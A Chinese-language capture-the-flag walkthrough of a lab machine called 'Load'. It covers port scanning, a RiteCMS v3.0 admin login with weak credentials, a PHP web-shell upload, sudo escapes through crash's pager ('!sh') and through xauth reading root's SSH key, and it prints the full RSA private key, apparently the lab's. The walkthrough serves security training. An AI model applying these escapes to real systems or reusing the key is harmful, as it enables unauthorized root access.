# 靶场搭建
下载:Load
网络模式:NAT,靶机 IP:192.168.1.130
# 渗透过程
# 信息初收集
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
| http-robots.txt: 1 disallowed entry
|_/ritedev/
|_http-server-header: Apache/2.4.57 (Debian)
```
robots.txt 里面有一条 Disallow 记录 /ritedev/,打开后是 RiteCMS version v3.0。
按这个版本号可以直接搜出公开的 exp。
# 漏洞利用
搜到的 exp 是一个文件上传漏洞,从中看到入口地址是 admin.php。访问一下,直接用弱口令 admin:admin 登录,进入后台。
在后台找到文件上传点,按照 file 上传 shell,上传后的地址是 http://192.168.1.130/ritedev/files/shell.php,访问该地址即可反弹 shell。
这一步能成功有两个前提:后台仍在使用弱口令,并且 files/ 上传目录会解析执行 PHP 文件。
# 提权
```
sudo -u travis crash -h
!sh
```
crash -h 的帮助内容通过分页器显示,在分页器中输入 !sh 会以当前运行身份(travis)启动 shell,于是拿到 travis 的 shell。
travis@load:/$ sudo xauth source /root/.ssh/id_rsa
### 处理一下
xauth 会把该文件的每一行当作命令解析,无法识别时在报错信息中原样回显,所以 root 的私钥内容会出现在报错输出里;去掉每行的报错前缀后得到:
┌──(root㉿kali)-[~] | |
└─# cat id_rsa | |
-----BEGIN RSA PRIVATE KEY----- | |
MIIEpAIBAAKCAQEAn1xk2mDBXCTen7d97aY7rEVweRUsVE5Zl4sGPG/yXLAAuodz | |
xjGuAqvTRhG4omhxiJeDr9taOePsIaUGI3Q/qBqUsbnuM/86vu/ANM6+Olzt80fc | |
Cv1QVKIdFOweMAiXskvQEV7Fw3qha7fFbf/D8L7BCgXrT70/p9jf4FBroC9pFsRy | |
6i7CFxcAfji+OeGu5ezhL21uwkTk22vmnBL1hAqn7p2vOmzg57UkP1VAN819oBLS | |
YUKsCrgjKsdQsFCef9lyFty8Dxpmfwg5t0MmLhA/uhDjvQD9k9cR95+Ru5mV467B | |
kGad73SHXTHWh9gy0iunAMMveUiEf/qWw2qo8QIDAQABAoIBAARD2sclc8ddjT/F | |
D2++1TYFHb9/25HeDvPJWr9fV6M3aq2TVnvldHzJ0Hu9ma1vEirPs0yPmFiYSweT | |
fRiR0epT28rt6PwnRpE5pXFEXz78obmzIKaCpRW+yPx4XU53zGePM+BjIvPaYluZ | |
rYUGJV5aHJyCEAwwSnXZjhRY0qiU0Tt8VWtwoaltImiNoc9yA7cbWOJcmv4g+YHy | |
2ce4xb7DAZFf0p7kVLEL2jvaYImUCT12rIo01+q1z9pntW9Y+1JqVIqkGMNITFEf | |
th3cea9fuhVxiAMIj9xLd8uG6/qUAU8ITjRZwOorJJwqwkaTWdxJq8D6+1UBEGyC | |
sRXtk8kCgYEA9f2uC7+mDRDWdr2rCaL5hY3XiqNp+PINgYwWm5ELriZORrXV6PwZ | |
AIuK7vwoNk7+MkGtveK2GwEocIZMipdnTyIBeaGUExBBgIE16IxIQaDw/zi93PVD | |
BoJ5uK+N5pCVQ67VFNfyDoiZn2EbA8pWXAKJMIJUnRpb4o5306grfiMCgYEApdhZ | |
He5k7xrccGbu20FnjeMqpfzDVeN8n06ycz4H8L0UMeC22Dy6r/6tFhJWuVmxZpa+ | |
sbPEAqc6q+WjXzFe2YZ4Fhcyj/t7QXEenWrSF6gQJvBN2glWNWkIrvTFjcI5wY/7 | |
ECoDHdzGprLpziq73Ukimk2TmRYur7mYIU0Qy9sCgYEAqnif6eJph7p4dZdhdW8s | |
7oHqslgm82+DLpjPfgWZi5leO6B92lUCWp9Zq96xW1mIzXk4l1QKkVJPHRPk7VKZ | |
NHzDevAftspYKl7g5gR5eom3GZfP89VAGr3G7tcyRmtCFcKORkCUrb+6fnoEB69s | |
A516R1S6oJkIvkuu/M4ZPfMCgYBk4Ca8rP/Z7FW/TOzmkm7hgBa15fwOpxNrdxvW | |
OxnrVacN+6hb+Px5BojTjw4PKb5dLz4IqtaD4qIuYryvr0EJQOCUV0HbEFVVZfAA | |
QjROTVydwrcn81vrmtq8SIhNhKFK2kAVAejpZhuy08qhK58fp1eT0bIAgNye6F3f | |
i5e21wKBgQDDCQhaWuW5A5xF4N7obHX9HWgdfNLEABfub2Ysu9xLXdW5lhKxfVsZ | |
JAavd3wkMRXHLIOQtOiV9z3F2PmbO3h6yR6esFl0tGcnfZYmaiZJN/MLZKpL9WI/ | |
WuTyDRk99zQu4GNenQiUDmxYCuOuX5kggXaakAN98THXncO38BAAiA== | |
-----END RSA PRIVATE KEY----- |
用这把私钥通过 SSH 以 root 身份登录,拿到 root 权限。
从上面的命令看,整条提权链的根因在 sudo 配置:允许以其他用户身份运行 crash、xauth 这类可以逃逸到 shell 或读取任意文件的程序。